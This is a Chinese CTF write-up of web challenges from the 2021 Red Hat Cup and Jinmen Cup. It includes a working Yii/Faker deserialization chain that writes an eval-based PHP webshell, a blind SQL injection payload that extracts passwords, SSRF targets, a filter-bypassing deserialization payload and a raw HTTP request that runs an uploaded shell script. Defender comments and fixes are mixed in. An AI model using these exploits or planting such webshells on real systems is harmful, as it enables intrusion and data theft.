2021_Red_Hat and WICCTF_WP

还在安徽,直接在酒店里看了看题。

红帽杯

find_it

robots.txt、.swp 源码泄露

flag 在 phpinfo 中

framework

Yii 的反序列化链

POC:

<?php
namespace yii\rest{
// Local stand-in for the framework's yii\rest\CreateAction. Only the class
// name and the property names have to match: the blob produced below is
// resolved against the real class when the target unserialize()s it, so no
// method bodies are reproduced here.
class CreateAction{
public $checkAccess;
public $id;
public $modelClass;

public function __construct(){
// $checkAccess is set to a callable name and $id to the argument it is handed.
// The chain relies on the target invoking ($checkAccess)($id) — presumably in
// the real CreateAction::run(); confirm against the Yii version in use. From a
// defender's side this pair is the sink: attacker-controlled object state
// reaching a dynamic call, which is why unserialize() on user input is fatal.
$this->checkAccess = 'assert';
$this->id = "file_put_contents('1.php', '<?php eval(\$_POST[Du1]);');";
}
}
}

namespace Faker{
use yii\rest\CreateAction;

// Stand-in for Faker\Generator. $formatters is protected, so it serializes
// under the mangled name "\0*\0formatters".
class Generator{
protected $formatters;

public function __construct(){
// Stores a callable array [object, 'run'] under the key 'close'. The chain
// presumably reaches it when the consumer calls ->close() on this object and
// Faker's __call looks the method name up in $formatters — verify against the
// Faker version bundled on the target, this file does not show it.
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}

namespace yii\db{
use Faker\Generator;

// Outermost object of the chain. Nothing in this file shows what the real
// yii\db\BatchQueryResult does with $_dataReader; the writeup relies on the
// target's own class touching it (presumably calling close() on it during
// cleanup — confirm in the Yii source in use). The property is private, so it
// serializes under the mangled name "\0yii\db\BatchQueryResult\0_dataReader".
class BatchQueryResult{
private $_dataReader;

public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
// Private/protected properties serialize with NUL bytes in their names, which
// is presumably why the output is base64-encoded rather than pasted raw.
// Defender note: the blob carries the literal class names and the string
// "assert" — a usable detection signature in request logs/WAF rules. The fix
// is never to unserialize() untrusted data (use json_decode), or at minimum
// to pass ['allowed_classes' => false].
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

// TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mzp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjU1OiJmaWxlX3B1dF9jb250ZW50cygnMS5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbRHUxXSk7Jyk7IjtzOjEwOiJtb2RlbENsYXNzIjtOO31pOjE7czozOiJydW4iO319fX0=

about 里传入,写个🐎,Apache_mod_cgi 绕 disable_func,readflag 读取 flag。

WebsiteManger

盲注得到管理员密码,payload:^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})

SSRF。

file:///flag
127.0.0.1

ezlight

占坑,垃圾某春秋十二点就急着关靶机,没来得及复现,先占个坑,Y1ng 师傅太QQQQQ了

https://www.gem-love.com/websecurity/2763.html#0x01_%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0

津门杯

power_cut

.swp 源码泄露。

反序列化,直接利用 logger 的 readfile 读取 flag,flag 被过滤,可以用双写绕过。

POC:

<?php
// Payload generator for the power_cut chain. `logger` is declared only so the
// class shape matches the target; it is never instantiated in this script.
// The writeup states that the target's logger performs the readfile() — that
// behaviour is not visible here.
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
}

class weblog {
// As written this serializes to s:5:"/flag". The payload the writeup actually
// sends uses "/flflagag" with the same declared length 5, which only
// deserializes cleanly if the target strips the substring "flag" before
// unserialize() — the double-write bypass described above. Defender note: a
// str_replace-style blocklist applied to serialized data is not a mitigation;
// do not unserialize() user input at all.
public $weblogfile="/flag";
}

echo urlencode(serialize(new weblog()));

payload:

O%3A6%3A%22weblog%22%3A1%3A%7Bs%3A10%3A%22weblogfile%22%3Bs%3A5%3A%22%2Fflflagag%22%3B%7D

hatephp

php5,p师傅文章里提到过这个方法,@ 被过滤,用 ? 即可:

POST /?code=?><?=`.%20/???/????????[?-[]`;?> HTTP/1.1
Host: 122.112.214.101:20004
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryrGKCBY7qhFd3TrwA
Content-Length: 170

------WebKitFormBoundaryrGKCBY7qhFd3TrwA
Content-Disposition: form-data; name="file"; filename="3.sh"

#!/bin/sh

cat /flag
------WebKitFormBoundaryrGKCBY7qhFd3TrwA--

ezsql

<?php
// ezsql challenge source as quoted in the writeup. The code is unchanged; the
// comments are review notes on why it is exploitable and how it would be fixed.
highlight_file(__FILE__); // discloses this file's source to every visitor
session_start();
$url = $_GET['url'] ?? false;
if($url)
{
// Blocklist rather than allowlist: only URLs containing "file" or "dict" are
// rejected. Every other scheme and every host — including the server itself
// — is fetched, which is the SSRF the writeup uses to reach admin.php.
// preg_match() also returns false on a PCRE error, and `false == 1` is false,
// so a failed match falls through to the request instead of failing closed.
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}

$ch = curl_init();
// Reads $_GET["url"] again instead of the already-checked $url. The value is
// the same here, but check and use should go through one variable.
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
// CURLOPT_RETURNTRANSFER is not set, so curl writes the fetched body straight
// into the response — the caller sees the internal reply verbatim.
// Fix: allowlist scheme and destination host, resolve the host and reject
// loopback/private ranges before connecting, and return a buffered result.
curl_exec($ch);
curl_close($ch);
}

?>

ssrf 打 admin.php:?url=http://121.36.147.29:20001/admin.php